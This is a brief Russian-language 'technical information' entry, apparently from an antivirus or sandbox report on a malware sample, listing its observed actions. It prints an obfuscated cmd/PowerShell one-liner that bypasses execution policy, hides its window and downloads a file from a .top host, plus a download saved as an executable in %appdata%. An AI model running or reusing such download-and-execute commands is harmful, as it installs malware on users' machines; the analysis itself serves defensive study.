Техническая информация
- http://aoopoerope.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "PowErSH^ell.Exe -^Ex^eCUTIon^POlI^CY b^YPas^s^ -nO^P^R^O^FiL^e ^-^WIndO^w^S^Ty^le Hi^DdE^N (N^E^W-oBj^eCT Sy^sTEm.N^e^t.WeBC^lIEnT)^.dOW^N^LOa^DFiL^E(^'http://aoopoerope.top/rea...
- DNS ASK ao###erope.top
- '<SYSTEM32>\cmd.exe' /C "PowErSH^ell.Exe -^Ex^eCUTIon^POlI^CY b^YPas^s^ -nO^P^R^O^FiL^e ^-^WIndO^w^S^Ty^le Hi^DdE^N (N^E^W-oBj^eCT Sy^sTEm.N^e^t.WeBC^lIEnT)^.dOW^N^LOa^DFiL^E(^'http://aoopoerope.top/rea...' (со скрытым окном)